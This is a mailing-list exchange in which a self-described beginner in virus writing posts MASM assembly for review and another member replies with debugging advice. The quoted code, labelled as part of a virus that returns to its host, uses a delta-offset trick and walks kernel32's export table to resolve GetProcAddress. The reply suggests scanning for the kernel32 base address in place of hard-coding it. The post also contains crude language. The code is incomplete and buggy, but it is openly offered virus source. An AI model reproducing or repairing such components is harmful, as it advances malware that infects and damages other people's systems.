Hi,
I did not go through the details of your code (busy with study
now)... anyhow, just my opinion; refer to the following line of your code:
XPKernel32BaseAddress equ 77E60000h
As far as I can see, you hard-coded the kernel32 base address... this may
cause the exception when the code does not succeed in finding the
right address.
Try adding another routine that searches for the kernel32.dll base address
instead of assuming it... refer to my article on the checksum technique...
cheers...
and nice code!!
I will study your code again and get back to you :)
--- In F-13Labs@yahoogroups.com, "sandundhammikaperera"
<sandundhammikaperera@...> wrote:
>
> man, I read the articles and found out the ways to get the kernel32
> base address with the hard-coded method, and I did a
> GetProcAddress
> search. But the problem is that I got an exception. Why was
> that?
> my code is this .
> First I wrote the code, but the variables in the code segment are
> read-only, so I changed that segment's attributes and tried again.
> Then, while debugging it in OllyDbg, it fails when it
> scans
> the 2Dh element of the export table of Kernel32.dll. What a
> fuck
> is this? Please help me, man, please... Please... I'm very
> curious
> now. I just can't breathe without assembly now. Please, man, help me,
> give me some drugs.
>
>
> This is my source code .
> ------------------------------------------------code begins ------
>
> .586
> .model flat , stdcall
> option casemap : none
> include c:\masm32\include\kernel32.inc
> includelib c:\masm32\lib\kernel32.lib
> include c:\masm32\include\user32.inc
> includelib c:\masm32\lib\user32.lib
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
> .code
> start:
> call GetDelta
> GetDelta:
> pop ebp
> sub ebp , OFFSET GetDelta - OFFSET start
> XPKernel32BaseAddress equ 77E60000h
> mov eax , XPKernel32BaseAddress
> call CheckForK32
> cmp eax , 0000000h
> jne ExitLoop
> mov eax , XPKernel32BaseAddress
> call GetApiAddress
> ;; now we are going to print a messageBox
> invoke ExitProcess , 0
>
>
>
>
>
> ExitLoop:
> ;; return to the host code in our virus .
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
>
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
> CheckForK32 proc
> cmp word ptr [ eax ] , 'ZM'
> jne NotFound
> add eax , 3ch
> mov eax , [eax]
> add eax , XPKernel32BaseAddress
> cmp word ptr [ eax ] , 'EP'
> jne NotFound
> xor eax , eax
> ret
> NotFound:
> ;; die
> CheckForK32 endp
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
> aPEHelder dd 0
> aimportDir dd 0
> aAddressTable dd 0
> aNameTable dd 0
> aOrdinalTable dd 0
> nOfExports dd 0
> sGetProcAddress db 'GetProcAddress' ,0
> aGetProcAddress dd 0
>
> GetApiAddress proc
> ;; oky now we have to get the PE real address
> mov eax , [eax+3ch]
> mov [ebp + (OFFSET aPEHelder - OFFSET start) ] , eax
> add eax , XPKernel32BaseAddress
> mov [ebp+( OFFSET aPEHelder- OFFSET start) ] , eax
> ;; now there is PE helder address in the eax
> ;; we shall play with it .
> ;; Then we need is the place where VA of import dir is kept
> ;; it is on the 78h
> add eax , 78h
> mov eax,dword ptr [ eax ]
> add eax , XPKernel32BaseAddress
> push eax
> mov [ebp + (OFFSET aimportDir- OFFSET start) ] , eax
> ;;oky we are pointed to the import table in eax
> ;; oky then get the addresstableRVA
> add eax , 1ch
> mov eax , [eax]
> add eax , XPKernel32BaseAddress
> mov dword ptr [ebp + (OFFSET aAddressTable-OFFSET start)] , eax
> pop eax
> ;; oky now we shoud have the Name PTR table
> push eax
> add eax , 20h
> mov eax , dword ptr [eax]
> add eax , XPKernel32BaseAddress
> mov dword ptr [ebp + (OFFSET aNameTable - OFFSET start) ] , eax
> pop eax
> push eax
> ;;Now we should get the Ordinal table
> add eax , 24h
> mov eax , dword ptr [eax]
> add eax , XPKernel32BaseAddress
> mov dword ptr [ ebp+ ( OFFSET aOrdinalTable - OFFSET start)] ,
> eax
> pop eax
> push eax
> ;; now we have to get nunber of exports
> add eax , 18h
> mov eax , dword ptr [eax]
> mov dword ptr [ebp + (OFFSET nOfExports- OFFSET start) ] , eax
> mov ecx , eax
> pop eax
>
> ;; Now we have to search for the APIs , Lets go
> ;; we shoud put the nOfExports to the ecx oky
> ;; virus leavaman sanaseama laba! .
> mov eax , dword ptr [ ebp + (OFFSET aNameTable - OFFSET start)]
> ;; now the eax is pointed to the first address of the string
> name
> mov edx , 0
> lea esi , [ebp +(OFFSET sGetProcAddress- OFFSET start)]
> mov ebx , esi
> CheckNext:
> push edx
> shl edx , 2
> add eax , edx
> pop edx
> mov edi , dword ptr [ eax ]
> add edi , XPKernel32BaseAddress
> inc edx
> mov esi , ebx
> CheckByte:
> ;; we have to compare the bytes in EDI with ESI
> cmpsb
> jne CheckNext
> cmp byte ptr [esi] , 0
> je GotIt
> cmp edx , ecx
> je ExitLoop ;; what a shitt this is not kernel32 what
a
> fuck .
> jmp CheckByte
> GotIt:
> ;; oky we now get that shitt . Oky now we have to store this
> shitt
> ;; its on the count of edx +1
> ;; but in the loop it was already incremented .This is where
> aAddressTable was need
> mov eax , [ebp + (OFFSET aAddressTable - OFFSET start) ]
> mov eax , [eax]
> push edx
> shl edx , 2
> add eax , edx
> pop edx
> mov eax , [eax]
> mov [ebp + (OFFSET aGetProcAddress-OFFSET start) ] , eax
> xor eax , eax
> xor edx , edx
> ret
> GetApiAddress endp
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
> ;;;
> end start
>
> -------------------------------------------------------------------
-
> Please make sure to change the attributes on the segments to full
> access in order to avoid memory access violations under OllyDbg.
>
>
> Okay man, please help me, man. I'm just a beginner at assembly
> language and virus writing. I need to go to hell.
> by : sanzilla jackcat
>
> sandundhammikaperera@...
>